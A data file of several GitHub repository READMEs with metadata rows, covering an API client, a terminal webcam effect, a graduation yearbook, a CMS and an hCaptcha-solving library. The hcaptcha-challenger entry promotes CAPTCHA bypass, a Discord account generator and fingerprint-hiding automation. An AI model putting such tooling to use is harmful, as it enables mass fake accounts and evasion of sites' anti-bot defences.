Visit [docs.yaade.io](https://docs.yaade.io).
## 🤔 Why did you develop Yaade?
I was looking for a self-hosted Postman alternative so that API collections can easily be shared between teammates. Even though popular solutions like <a href="https://hoppscotch.io/de/">Hoppscotch</a> exist, their self-hosted app does not come with authentication and relies on Firebase for persistence. Yaade is developed from the ground up with self-hosting and security in mind. That means sensitive information in API requests can safely be stored on your own server!
## 🌟 Features
1. Self-hosted: data never leaves your own server
2. Multi-user: manage users and their permissions
3. Persistent: even across container or server restarts
4. Easy single-file data import / export
5. Requests are executed on your machine so you can call localhost as well as remote servers
6. Collection and Request description (documentation) with Markdown
7. Request/Response scripts (for both collections and requests)
8. Most importantly: dark mode default
## ⚡ Install
To have the best experience with Yaade run the docker container on your server and install the browser extension on your local machine.
### 1. 🐋 Docker
```bash
docker volume create yaade
docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest
```
The default password is `password`. After login go to ⚙️ > Account and change the password.
### 2. 🔧 Extension
Yaade uses a browser extension as a proxy to enable CORS requests. Install the extension using your browsers extension store. Currently only a chrome extension is available. You can find it <a href="https://chrome.google.com/webstore/detail/yaade-extension/mddoackclclnbkmofficmmepfnadolfa">here</a>. Then open it and input your server URL, eg. `https://yaade.example.com/`. From that point all requests originating from your Yaade browser tabs will be proxied through the extension.
## ⬆️ Upgrade
To upgrade the docker container with a new version, first stop the running container, pull the latest version and start a new container with the old volume.
```bash
docker rm -f yaade
docker pull esperotech/yaade:latest
docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest
```
## 💾 Technology
1. SPA built with TypeScript, React and Vite.
2. Backend built with Kotlin.
3. H2 file-based database.
4. Browser extension with plain JavaScript.
## 🖥️ Local development
1. Install the required dependencies
- Java 11
- Kotlin
- Node >= 16
2. Clone the repository
3. Install the project specific dependencies
```bash
cd scripts/
chmod +x install.sh
./install.sh
```
4. Start the server on port 9339 using your IDE of choice (I use IntelliJ IDEA)
- you can also run it by using the jar file directly `$ java -jar server/build/libs/yaade-server-1.0-SNAPSHOT`
- note that you must set the environment variable `YAADE_ADMIN_USERNAME` to run
5. Start the vite dev server on port 9338
```bash
cd client/
npm run dev
```
6. Start the dev-proxy on port 9337
```bash
cd dev-proxy/
node index.js
```
7. Now open your browser and visit http://localhost:9337
## 🔨 Build
```bash
cd scripts/
chmod +x build.sh
./build.sh
```
## Screenshots
### 🌙 Dark mode
<img src="assets/dark-mode.png" alt="dark-mode-screenshot"/>
### ☀️ Light mode
<img src="assets/light-mode.png" alt="light-mode-screenshot"/>
### More Screenshots
<div style="width:100%;min-width:100%;display:flex;flex-wrap:wrap;justify-content:space-evenly">
<img style="width:48%;min-width:48%;max-width:48%;height:auto;margin-bottom:20px" src="assets/documentation.png" alt="documentation-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto;margin-bottom:20px" src="assets/environments.png" alt="environments-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto" src="assets/scripts.png" alt="scripts-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto" src="assets/user-management.png" alt="user-management-screenshot"/>
</div>
## 🤝 How can I contribute?
Your contribution is very welcome! First open an issue about the topic you want to contribute on, eg. adding a new feature, bugfixing or refactoring. We will then discuss further details. Eventually, I will review your Pull Request and merge / release it.
| Yaade is an open-source, self-hosted, collaborative API development environment. | selfhosted,docker,kotlin,typescript,h2-database,api,postman,hoppscotch | 0 | 6 | 76 | 328 | 23 | 3 | 0 |
joschuck/matrix-webcam | # matrix-webcam
[![PyPI version](https://badge.fury.io/py/matrix-webcam.svg)](https://badge.fury.io/py/matrix-webcam)
[![License MIT](https://img.shields.io/github/license/joschuck/matrix-webcam.svg)](https://github.com/joschuck/matrix-webcam/blob/main/LICENSE)
[![issues](https://img.shields.io/github/issues/joschuck/matrix-webcam.svg)](https://github.com/joschuck/matrix-webcam/issues)
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![Checked with mypy](http://www.mypy-lang.org/static/mypy_badge.svg)](http://mypy-lang.org/)
This package displays your webcam video feed in the console.
Take your next video conference from within the matrix!
![matrix-webcam demo](https://raw.githubusercontent.com/joschuck/matrix-webcam/main/doc/matrix-webcam02.gif)
## Running it
Make sure you have Python and pip installed. Installation using pip:
$ pip install matrix-webcam # make sure it's in your PATH for it to run, alternatively use sudo
$ matrix-webcam
Installing and running it from source:
$ git clone https://github.com/joschuck/matrix-webcam.git
$ cd matrix-webcam
$ python -m pip install .
$ matrix-webcam
Tip: Shrink your font size, it will look even more hacky
usage: matrix-webcam [-h] [-l LETTERS] [-p PROBABILITY] [-u UPDATES_PER_SECOND]
options:
-h, --help show this help message and exit
-d DEVICE, --device DEVICE
Sets the index of the webcam if you have more than one webcam.
-l LETTERS, --letters LETTERS
The number of letters produced per update.
-p PROBABILITY, --probability PROBABILITY
1/p probability of a dispense point deactivating each tick.
-u UPDATES_PER_SECOND, --updates-per-second UPDATES_PER_SECOND
The number of updates to perform per second.
## Can I use this for Teams/Zoom/Skype etc.?
### For Windows/Mac Users
Yes! You can for example use [OBS Studio](https://obsproject.com/) ~~together with the [Virtual Cam plugin](https://github.com/CatxFish/obs-virtual-cam)~~. Note: OBS Studio has shipped a built-in virtual camera since version 26.0.0, so you can use it without installing this plugin.
Then all you need to do is select the virtual webcam in Teams/Zoom/Skype.
### For Linux Users
First we need to make sure you have the [v4l2loopback kernel module](https://github.com/umlaeute/v4l2loopback) to create V4L2 loopback devices setup.
This module allows you to create "virtual video devices".
Normal (v4l2) applications will read these devices as if they were ordinary video devices, but the video will not be read from e.g. a capture card but instead it is generated by another application.
It should be available in your distro's package manager.
Under Ubuntu install it using:
$ sudo apt install -y v4l2loopback-dkms v4l2loopback-utils
Now we need to create a virtual v4l2 device (exclusive_caps=1 and YUV2 conversion is required by Chromium for the device to be recognized):
$ sudo modprobe v4l2loopback devices=1 video_nr=42 card_label="Virtual Camera" exclusive_caps=1 max_buffers=2
Now we need to find the `xid` of the terminal window we will launch `matrix-webcam` in using
$ xdotool getactivewindow
79869947 # sample output
Optionally resize the terminal window to something reasonable from another terminal and then launch matrix webcam
$ wmctrl -i -r 79869947 -e 0,300,300,1280,720 # in another terminal (2)
Now launch matrix-webcam
$ matrix-webcam # in the terminal that was just resized
Now launch the virtual device in terminal (2) - you need [Gstreamer](https://gstreamer.freedesktop.org/documentation/installing/on-linux.html?gi-language=c) for this, check the link on how to install it
$ gst-launch-1.0 ximagesrc xid=79869947 ! video/x-raw,framerate=30/1 ! videoconvert ! video/x-raw,format=YUY2 ! v4l2sink device=/dev/video42
That's it, your webcam should show up in Chromium, Teams, etc.!
## Development
I'd recommend creating a new virtual environment (if you are on Ubuntu, install venv support using `sudo apt install python3-venv`) using
$ python3 -m venv venv/
$ source venv/bin/activate
Then install the dependencies using:
$ pip install -e .[dev,deploy]
Setup pre-commit, too:
$ pre-commit install
### TODO
* [x] Add Virtual webcam documentation for Linux/Gstreamer
* [x] add webcam selection
* [ ] Move to opencv-python-headless
* [ ] add tests
## License
This project is licensed under the MIT License (see the `LICENSE` file for details).
| Take your video conference from within the matrix. | null | 0 | 2 | 2 | 30 | 0 | 2 | 0 |
minad/org-modern | null | :unicorn: Modern Org Style | null | 0 | 8 | 31 | 255 | 0 | 4 | 0 |
education/GitHubGraduation-2022 | # GitHub Graduation-2022
### Available Translations 🗣
* [Arabic](./translations/README.ar.md)
* [Armenian](./translations/README.am.md)
* [Bangla](./translations/README.bn_bd.md)
* [中文](https://bit.ly/3kE3Ezc)
* [Español (España)](./translations/README.es-es.md)
* [Español (México)](./translations/README.es-mx.md)
* [Filipino](./translations/README.tl.md)
* [French](./translations/README.fr.md)
* [German](./translations/README.de.md)
* [Hindi](./translations/README.hi.md)
* [Indonesian](https://bit.ly/3yeTRrI)
* [Italian](./translations/README.it.md)
* [日本語](https://bit.ly/38TCVfm)
* [Korean](https://bit.ly/3MS4owN)
* [Malay](./translations/README.may.md)
* [Nepali](./translations/README.np.md)
* [Polski](https://bit.ly/38c411k)
* [Portuguese (Brazil)](https://bit.ly/3LI8kAc)
* [मराठी (Marathi)](./translations/README.mr.md)
* [Punjabi](./translations/README.pun.md)
* [Русский](https://bit.ly/3w7d7EL)
* [Somali](./translations/README.so.md)
* [ไทย](./translations/README.th.md)
* [Türkçe](./translations/README.tr.md)
* [Urdu](./translations/README.ur.md)
*Read the instructions in your language or [contribute a translation](translations/README.md)!*
## Sep 05, 2022
Re-Print GitHub Graduation card. We are aware that some of you have not received the card yet. We are opening a form for a reprint. We will keep it open until Sep 30.
Please only fill out the form if you have not received your card. [form](https://airtable.com/shrq4pObYbyaxwlpD)
## May 30, 2022
And that’s a wrap on the GitHub 2022 Yearbook ✨✅
Submissions to the repository are closed as of 12:00pm PT. Yearbook will be live on Wednesday June 8. Check back here for updates!
If you believe there has been a mistake with reviews, please let us know in [an Issue](https://github.com/education/GitHubGraduation-2022/issues). All Issues will be responded to before the event on June 11. Don’t forget to [save the date](#graduation-day-🎓) and follow us on [Twitch](https://www.twitch.tv/githubeducation) for notifications! See you on stage at graduation 👋
![2022-github-graduation-social-card-1](/assets/GHG_Blog_1.jpg)
This repository contains the yearbook for **GitHub Graduation 2022**. By issuing a pull request to this repository, you can request to be added to the GitHub Class of 2022.
The first 7,500 pull requests successfully merged into the repository by May 27 will receive a custom trading card, stickers, and a letter in the mail.
## Privacy Notice 👀
Consider that all the information that you add to this repository will be publicly available.
- If you don't feel comfortable with displaying your full name, you can include a short name or nickname instead.
# Who can apply 📝
We invite any student who has graduated, or plans to graduate, in 2022 to apply to the yearbook. This includes bootcamps, code camps, high school graduates, Master's graduates, Ph. D. Graduates, etc.
The eligibility criteria are -
1. You have been verified as a student with the GitHub Student Developer Pack. Not yet a part of the Pack? [Apply here](https://education.github.com/discount_requests/student_application?utm_source=2022-06-11-GitHubGraduation).
2. You have not participated in a past GitHub Graduation event.
3. You identify as a graduate in the year 2022.
# How to join the Class of 2022
Here are two steps to join graduation and receive your custom trading card and stickers in the mail.
1. [Fill out the **shipping form**](https://airtable.com/shrVMo8ItH4wjsO9f)
⚠️ the form needs to be done before creating your Pull Request (PR) and does not guarantee participation in the event. Your PR must successfully merge into the repository and only the first 7,500 merged PRs will receive cards in the mail.
2. **Submit a pull request** with your profile information to join the Yearbook and be highlighted in the graduation event.
## 1. Fill out the shipping form.
Information submitted to [the swag shipment form](https://airtable.com/shrVMo8ItH4wjsO9f) is only used to ship trading cards for graduation. Submitting the form does not guarantee you will receive anything in the mail. Only the first 7,500 graduates to merge their Pull Request to the GitHub Yearbook will receive a shipment.
## 2. Add yourself to Yearbook 🏫
Replace `<YOUR-USERNAME>` with your GitHub username in this guide. Please note that the `<YOUR-USERNAME>` here is **Case Sensitive**. For Example, if your username is `MonaTheOctocat`, using anything other than it like `monatheoctocat` or `monaTheoctocat` will throw an error while submitting the Pull Request, make sure you're using the exact same case as your username in both the folder name and file name.
### First, create the folder \_data/YOUR-USERNAME/
Fork this repository, create a new folder inside the `_data` folder, and name it with your username. It should look something like this `_data/<YOUR-USERNAME>/`. Ex.
```
_data/MonaTheOctocat/
```
### Second, add your profile information
Create a markdown file in your folder following the convention `<YOUR-USERNAME>.md`. Ex.
```
_data/MonaTheOctocat/MonaTheOctocat.md
```
Copy the next template into your file, delete the boilerplate data and fill the information with yours.
```
---
name: FULLNAME-OR-NICKNAME # No longer than 28 characters
institution: INSTITUTION-NAME 🚩 # no longer than 58 characters
quote: YOUR-SENIOR-QUOTE # no longer than 100 characters, avoid using quotes(") to guarantee the format remains the same.
github_user: YOUR-GITHUB-USERNAME
---
```
_Do not use special characters in the template above._
### Third, submit your Pull Request
Go through the checklist on the pull request template to guarantee your submission is valid. The GitHub Education team will review your application, approve and merge your submission if everything is correct. Otherwise, you will get notified of the changes requested in the pull request comment section.
Having trouble submitting your Pull Request? [Ask for help in the GitHub Community](https://github.com/orgs/github-community/discussions/categories/github-education)!
# Graduation Stories 2022 👩🏫👨🏫 (optional)
Looking for more ways to participate in GitHub Graduation and the possibility of being featured on our social account?
We want to hear about the amazing things you achieved during your academic year and how GitHub helped you to accomplish your goals. Take a moment to record a video or write a message and share your story with us, your teachers, and your classmates.
[How to participate](https://drive.google.com/file/d/1AcgUKLXx6WIC5s4eanzOfj8EsiYHARrt/view?usp=sharing)
We are looking forward to hearing what you have to say, and we are grateful to have you as part of our community 💖
Remember: you have until May 30th to submit your story!
# A note on swag 🛍
The first 7,500 successfully merged PRs will receive a custom holographic developer trading card with their GitHub status in the mail.
What does this mean? We will use your public GitHub profile information to create a trading card. To ensure your trading card best reflects you, please make sure your GitHub profile picture and bio are up to date and what you would like shown on the card.
# Graduation Day 🎓
Don't forget to watch the livestream!
- 📆 Saturday, June 11, 2022
- ⏰ 9:00am PT | 16:00 GMT | 21:30 IST
- 📍 Follow the [GitHub Education Twitch Channel](https://twitch.tv/githubeducation) for notifications.
- 📎 Add the event to your calendar:
- [Google Calendar](https://calendar.google.com/calendar/render?action=TEMPLATE&dates=20220611T160000Z%2F20220611T180000Z&details=&location=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&text=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A)
- [Outlook Calendar](https://outlook.live.com/calendar/0/deeplink/compose?allday=false&body=&enddt=2022-06-11T18%3A00%3A00%2B00%3A00&location=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&path=%2Fcalendar%2Faction%2Fcompose&rru=addevent&startdt=2022-06-11T16%3A00%3A00%2B00%3A00&subject=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A)
- [Yahoo Calendar](https://calendar.yahoo.com/?desc=&dur=&et=20220611T180000Z&in_loc=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&st=20220611T160000Z&title=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A&v=60)
Questions about GitHub Graduation? Ask in the [GitHub Community Discussions](https://github.com/orgs/github-community/discussions/categories/github-education).
| Join the GitHub Graduation Yearbook and "walk the stage" on June 11. | null | 0 | 5,430 | 8,256 | 14,182 | 12 | 5 | 3 |
QIN2DIM/hcaptcha-challenger | <div align="center">
<h1> hCaptcha Challenger</h1>
<p>🚀 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution.</p>
<img src="https://img.shields.io/pypi/v/hcaptcha-challenger?style=flat-square&logo=python&logoColor=white">
<img src="https://img.shields.io/pypi/dw/hcaptcha-challenger?style=flat-square&logo=aiqfome&label=downloads%40PyPI">
<a href="https://github.com/QIN2DIM/hcaptcha-challenger/releases"><img src="https://img.shields.io/github/downloads/QIN2DIM/hcaptcha-challenger/model/total?style=flat-square&logo=github"></a>
<br>
<a href="https://discord.gg/m9ZRBTZvbr"><img alt="Discord" src="https://img.shields.io/discord/978108215499816980?style=social&logo=discord&label=echosec"></a>
<a href = "https://t.me/+Cn-KBOTCaWNmNGNh"><img src="https://img.shields.io/static/v1?style=social&logo=telegram&label=chat&message=studio" ></a>
<br>
<br>
</div>
![hcaptcha-challenger-demo](https://github.com/QIN2DIM/img_pool/blob/main/img/hcaptcha-challenger3.gif)
## Introduction
Does not rely on any Tampermonkey script.
Does not use any third-party anti-captcha services.
Just implement some interfaces to make `AI vs AI` possible.
## What's included
| Challenge Type | Pluggable Resource |
| --------------------------------------- | ------------------------------------------------------------ |
| `image_label_binary` | ResNet ONNX classification [#challenge](https://github.com/QIN2DIM/hcaptcha-challenger/issues?q=label%3A%22%F0%9F%94%A5+challenge%22+) |
| `image_label_area_select: point` | YOLOv8 ONNX detection [#588](https://github.com/QIN2DIM/hcaptcha-challenger/issues/588) |
| `image_label_area_select: bounding box` | YOLOv8 ONNX segmentation [#592](https://github.com/QIN2DIM/hcaptcha-challenger/issues/592) |
| `image_label_multiple_choice` | ViT ONNX zero-shot motion [#917](https://github.com/QIN2DIM/hcaptcha-challenger/issues/917) |
| Advanced Task | Pluggable Resource |
| --------------------------- | ------------------------------------------------------------ |
| `Rank.Strategy` | [#nested-model-zoo](https://github.com/QIN2DIM/hcaptcha-challenger/issues/797) |
| `self-supervised challenge` | [#CLIP-ViT](https://github.com/QIN2DIM/hcaptcha-challenger/issues/858) |
## Workflow
| Tasks | Resource |
| ----------------------------- | ------------------------------------------------------------ |
| `ci: sentinel` | [![hCAPTCHA Sentinel](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/sentinel.yaml/badge.svg?branch=main)](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/sentinel.yaml) |
| `ci: collector` | [![hCAPTCHA Collector](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/collector.yaml/badge.svg)](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/collector.yaml) |
| `datasets: VCS, annoate` | [#roboflow](https://app.roboflow.com/), [#model-factory](https://github.com/beiyuouo/hcaptcha-model-factory) |
| `model: ResNet - train / val` | [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/captcha-challenger/hcaptcha-model-factory/blob/main/automation/roboflow_resnet.ipynb) |
| `model: YOLOv8 - train / val` | [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/QIN2DIM/hcaptcha-challenger/blob/main/automation/roboflow_yolov8.ipynb) |
| `model: upload, upgrade` | [#objects](https://github.com/QIN2DIM/hcaptcha-challenger/tree/main/src), [#modelhub](https://github.com/QIN2DIM/hcaptcha-challenger/releases/tag/model) |
| `datasets: public, archive` | [#roboflow-universe](https://universe.roboflow.com/qin2dim/), [#captcha-datasets](https://github.com/captcha-challenger/hcaptcha-whistleblower) |
## Contributors
I would like to express my sincere gratitude to all the contributors.
[![](https://opencollective.com/hcaptcha-challenger/contributors.svg?width=890&button=false)](https://github.com/QIN2DIM/hcaptcha-challenger/graphs/contributors)
## What's next
- [Dislock](https://github.com/Vinyzu/DiscordGenerator), the most advanced Discord Browser Generator. Powered by hCaptcha Solving AI.
- [undetected-playwright](https://github.com/QIN2DIM/undetected-playwright), stash the fingerprint of playwright-based web agents.
- [epic-awesome-gamer](https://github.com/QIN2DIM/epic-awesome-gamer), gracefully claim weekly free games from Epic Store.
## Reference
- [microsoft/playwright-python](https://github.com/microsoft/playwright-python)
- [ultrafunkamsterdam/undetected-chromedriver](https://github.com/ultrafunkamsterdam/undetected-chromedriver)
- hCaptcha challenge template site [@maximedrn](https://github.com/maximedrn/hcaptcha-solver-python-selenium)
| 🥂 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution. | yolov5,hcaptcha,opencv-python,onnx-models,hcaptcha-solver,solver,onnx,yolo,onnxruntime,playwright | 1 | 16 | 117 | 885 | 34 | 4 | 4 |
Thecosy/IceCMS | <p align="center">
<a href="https://www.icecmspro.com" target="_blank">
<img alt="logo" style="height: 120px" src="https://res.cloudinary.com/dxl1idlr5/image/upload/v1700470902/logo_s4maqv.svg"/>
</a>
</p>
<p align="center">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/JDK-1.8+-orange">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/SpringBoot-2.2.7.RELEASE-brightgreen">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/MyBatis-3.5.5-red">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/Vue-2.6.11-brightgreen">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/license-MIT-blue">
<img style="padding: 4px;" alt="Label" src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FNaccl%2FNBlog&count_bg=%2344CC11&title_bg=%23555555&icon=notist.svg&icon_color=%231296DB&title=hits&edge_flat=false">
</p>
## Introduction
A content management system with separated front end and back end, based on Spring Boot + Vue
Demo: ([www.icecmspro.com](https://www.icecmspro.com/))
Admin: ([admin.icecmspro.com](https://admin.icecmspro.com/))
Official site: ([www.icecms.cn](https://doc.icecms.cn))
IceCMS docs: ([http://www.icecms.cn](https://www.icecms.cn))
Content management: manage many content types such as articles, images and resources;
Category management: custom categories with add/delete/edit/query operations;
User management: manage admin users, including adding, deleting, editing and assigning permissions;
Statistics: analyze site traffic, user behavior and more;
Template management: customize site templates to quickly build a site;
SEO optimization: site title, keywords, description and other SEO features.
## Preview URLs:
Front end: [www.icecmspro.com](https://www.icecmspro.com)
uniapp mobile: [uni.icecmspro.com](https://m.www.icecmspro.com)
Admin: [admin.icecmspro.com](https://admin.icecmspro.com) account `admin`, password `admin123`
API docs: [api.icecmspro.com/doc.html](https://api.icecmspro.com/doc.html)
## PC (web)
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689828922/63d19ee5a6c55_xu7ex3.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829049/63d19ee456c4b_fhibyf.png" width = “50%”>
</div>
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829099/63d19ee6e070e_meudqj.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829121/63d19ee4b609d_pt54fj.png" width = “50%”>
</div>
## Admin dashboard
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237058/Screenshot_2024-03-12_at_17.48.51_el9tcs.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237057/Screenshot_2024-03-12_at_17.49.02_eioj84.png" width = “50%”>
</div>
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237060/Screenshot_2024-03-12_at_17.49.12_x7aotb.png" width = “50%”>
</div>
## UniApp H5 & Mini Program mobile
<img alt="describe" src="https://i0.hdslb.com/bfs/album/354a1caa29bfd8bc9571be67b18db13227bea80f.png" width="280" height="405">
## Backend
1. Core framework: [Spring Boot](https://github.com/spring-projects/spring-boot)
2. Security framework: [Spring Security](https://github.com/spring-projects/spring-security)
3. Token authentication: [jjwt](https://github.com/jwtk/jjwt)
4. Persistence framework: [MyBatis](https://github.com/mybatis/spring-boot-starter)
5. Pagination plugin: [PageHelper](https://github.com/pagehelper/Mybatis-PageHelper)
6. NoSQL cache: [Redis](https://github.com/redis/redis)
7. Markdown to HTML: [commonmark-java](https://github.com/commonmark/commonmark-java)
8. Offline IP address database: [ip2region](https://github.com/lionsoul2014/ip2region)
Developed on JDK 8; on JDK versions above 8 you need to add this dependency:
```xml
<dependency>
<groupId>javax.xml.bind</groupId>
<artifactId>jaxb-api</artifactId>
<version>2.3.0</version>
</dependency>
```
## Frontend
Core frameworks: Vue 2.x, Vue Router, Vuex
The Vue project is built with @vue/cli 4.x
JS dependencies and referenced CSS: [axios](https://github.com/axios/axios), [moment](https://github.com/moment/moment), [nprogress](https://github.com/rstacruz/nprogress), [v-viewer](https://github.com/fengyuanchen/viewerjs), [prismjs](https://github.com/PrismJS/prism), [APlayer](https://github.com/DIYgod/APlayer), [MetingJS](https://github.com/metowolf/MetingJS), [lodash](https://github.com/lodash/lodash), [mavonEditor](https://github.com/hinesboy/mavonEditor), [echarts](https://github.com/apache/echarts), [tocbot](https://github.com/tscanlin/tocbot), [iCSS](https://github.com/chokcoco/iCSS)
### Admin UI
The admin CMS part is based on [vue-admin-template](https://github.com/PanJiaChen/vue-admin-template)
The UI framework is [Element UI](https://github.com/ElemeFE/element)
### Frontend UI
[Element UI](https://github.com/ElemeFE/element): partially used for some small components, with tweaked UI styles, to get results quickly
## Recent updates
Added tag feature
Polished parts of the UI
Docker deployment for the front end
One-click deployment with docker compose
# Quick start
Docker deployment (recommended; good for quickly going live or testing)
# If Docker is not installed yet, install it first; skip this step if Docker is already installed
yum install docker-ce -y
# Start Docker
systemctl start docker
# Configure a registry mirror inside China
# Create the docker config directory
sudo mkdir -p /etc/docker
# Create the config file
sudo tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://mirror.ccs.tencentyun.com"]
}
EOF
# Reload the new config
sudo systemctl daemon-reload
# Restart the Docker service
sudo systemctl restart docker
main - run the commands
PS: execute them in order
1. Run the MySQL container
docker run -d -p 0:3389 \
--name ice-sql \
--restart always \
thecosy/icemysql:v2.2.0
2.运行Spring容器
docker run -d -p 8181:8181 \
--name ice-api \
--restart always \
--link ice-sql:db \
thecosy/icecms:v2.2.0
3.运行Vue容器
docker run -d -p 3000:80 \
--name ice-vue \
--restart always \
--link ice-api:iceApi \
thecosy/icevue:v2.2.0
#访问前端地址http://ip:3000
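The "one-click Docker Compose deployment" mentioned in the recent updates can be expressed roughly as follows. This is only a sketch assembled from the `docker run` commands above (same images, ports, and link aliases); the service names are illustrative and the compose file actually shipped with the project may differ.
```yaml
# Hypothetical docker-compose.yml sketch derived from the docker run commands above;
# the project's official compose file may differ.
version: "3"
services:
  ice-sql:
    image: thecosy/icemysql:v2.2.0
    restart: always
    # host port mapping omitted; the API reaches MySQL over the compose network
  ice-api:
    image: thecosy/icecms:v2.2.0
    restart: always
    ports:
      - "8181:8181"
    links:
      - "ice-sql:db"        # the API container reaches MySQL under the alias "db"
  ice-vue:
    image: thecosy/icevue:v2.2.0
    restart: always
    ports:
      - "3000:80"
    links:
      - "ice-api:iceApi"    # the Vue container reaches the API under the alias "iceApi"
```
With such a file in place, `docker compose up -d` would start all three containers, and the frontend would again be reachable at http://ip:3000.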
## Directory Structure
```
iceCMS/
├── HELP.md
├── IceCMS-java.iml
├── IceCMS-main            -- Java main application (startup entry point)
│   ├── IceCMS-main.iml
│   ├── main.iml
│   ├── pom.xml
│   ├── src
│   └── target
├── IcePay-ment            -- Java payment module
│   ├── IcePay-ment.iml
│   ├── pom.xml
│   ├── src
│   └── target
├── IceWk-ment             -- Java frontend API module
│   ├── IceWk-ment.iml
│   ├── pom.xml
│   ├── src
│   └── target
├── IceWk-uniApp           -- H5 / UniApp module
│   ├── App.vue
│   ├── LICENSE
│   ├── components
│   ├── main.js
│   ├── manifest.json
│   ├── nPro
│   ├── package-lock.json
│   ├── package.json
│   ├── pages
│   ├── pages.json
│   ├── static
│   ├── store
│   ├── subPage
│   ├── template.h5.html
│   ├── theme
│   ├── uni.scss
│   ├── uni_modules
│   ├── utils
│   └── vue.config.js
├── IceWk-vues             -- Frontend Vue module
│   ├── LICENSE
│   ├── README.md
│   ├── babel.config.js
│   ├── build
│   ├── dist
│   ├── jest.config.js
│   ├── jsconfig.json
│   ├── node_modules
│   ├── package-lock.json
│   ├── package.json
│   ├── postcss.config.js
│   ├── public
│   ├── serverless.yml
│   ├── src
│   ├── vue.config.js
│   └── yarn.lock
├── README.md
├── bin
│   ├── clean.bat
│   ├── package.bat
│   └── run.bat
├── doc
│   └── IceCMS环境使用手册.docx    -- IceCMS environment manual
├── mvnw
├── mvnw.cmd
├── pom.xml
└── sql                    -- Project SQL files
    ├── icecms5.6.sql
    └── icecms8.0.sql
```
## <strong>Minimal Development Environment</strong>
1. Environment requirements:
- MySQL
- JDK 1.8 or above
- Maven
- Node.js
- WeChat DevTools
### <strong>Backend Deployment</strong>
2. Create a MySQL database named `IceCMS` and run `/sql/IceCMS.sql` to initialize the table data.
3. Start the backend service of the iceCMS-main admin module:
3.1. Edit `IceCMS-main/src/main/resources/application.yml` to configure the database connection (a sketch of the typical settings follows the commands below).
3.2. Install and start Redis (optional; skipping it does not break anything).
3.3. Open a terminal and run the following commands:
```bash
cd iceCMS
mvn install
mvn clean package
java -Dfile.encoding=UTF-8 -jar iceCMS/iceCMS-main/target/iceCMS.jar
# or, from the directory containing iceCMS.jar, run: java -jar iceCMS.jar
```
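For step 3.1, the database (and optional Redis) settings follow the usual Spring Boot conventions. The snippet below is only a sketch with placeholder values; the exact keys and structure in the project's own `application.yml` may differ, so adapt it to the file you find in the repository.
```yaml
# Hypothetical sketch for step 3.1 -- standard Spring Boot datasource/Redis keys
# with placeholder values; check the project's actual application.yml for the
# exact structure.
spring:
  datasource:
    driver-class-name: com.mysql.cj.jdbc.Driver
    url: jdbc:mysql://localhost:3306/IceCMS?useUnicode=true&characterEncoding=utf-8&serverTimezone=Asia/Shanghai
    username: root
    password: your-password
  redis:
    host: localhost
    port: 6379
    password: ""   # leave blank if Redis has no password (see Notes below)
```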
### <strong>Frontend Deployment</strong>
4. Enter the iceCMS-vues directory, open a terminal, and run the following commands:
```bash
# clone the project
git clone https://github.com/PanJiaChen/vue-admin-template.git
# enter the project directory
cd IceWk-VUE
# install dependencies
npm install
# It is recommended not to install dependencies with cnpm directly, as it causes all sorts of odd bugs.
# Slow npm downloads can be worked around as follows:
npm install --legacy-peer-deps --registry=https://registry.npm.taobao.org
# start the dev server
npm run dev
```
### Build & Release
```bash
# build for the staging environment
npm run build:stage
# build for production
npm run build:prod
```
5. Start the frontend
Open [http://localhost:9528](http://localhost:9528) in a browser to reach the frontend pages.
The frontend admin panel is available at http://localhost:9528/admin.
6. Start the UniApp mobile client
Download HBuilderX.
Open the UniApp mobile plugin page ([https://ext.dcloud.net.cn/plugin?id=9261](https://ext.dcloud.net.cn/plugin?id=9261)), click Import, and the project will be imported locally.
Alternatively, open the IceCMS-uniapp project locally: open the `IceWK-uniApp` directory, then build and package it from there.
## Notes
Some common issues:
